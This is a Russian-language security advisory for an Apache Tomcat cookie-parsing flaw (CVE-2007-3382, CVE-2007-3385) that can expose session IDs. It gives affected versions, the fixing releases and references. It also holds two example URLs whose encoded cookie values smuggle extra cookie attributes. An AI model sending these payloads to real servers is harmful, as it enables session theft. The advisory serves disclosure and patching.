Дата публикации: | 16.08.2007 |
Дата изменения: | 10.02.2009 |
Всего просмотров: | 2071 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2007-3382 CVE-2007-3385 |
Вектор эксплуатации: | Удаленная |
Воздействие: | Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
Apache Tomcat 3.x
Apache Tomcat 4.x Apache Tomcat 5.x Apache Tomcat 6.x |
Уязвимые версии: Apache Tomcat версии до 6.0.14
Описание: Уязвимость существует из-за ошибки при обработке символов единичных кавычек или последовательностей символов \" в значениях файла куки. Удаленный пользователь может получить доступ к важным данным, включая ID сессий. Примеры: 1. http://[host]/servlets-examples/servlet/CookieExample?cookiename=BLOCKER&cookievalue=%5C%22A%3D%27%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2Fservlets-examples%2Fservlet+%3B 2. http://[host]/examples/servlets/servlet/CookieExample?cookiename=HAHA&cookievalue=%5C%22FOO%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2F%3B URL производителя: tomcat.apache.org Решение: Установите последнюю версию 4.1.HEAD, 5.5.25 или 6.0.14 с сайта производителя. Журнал изменений:
10.02.2009 |
|
Ссылки: |
http://www.kb.cert.org/vuls/id/993544 http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065252.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065253.html |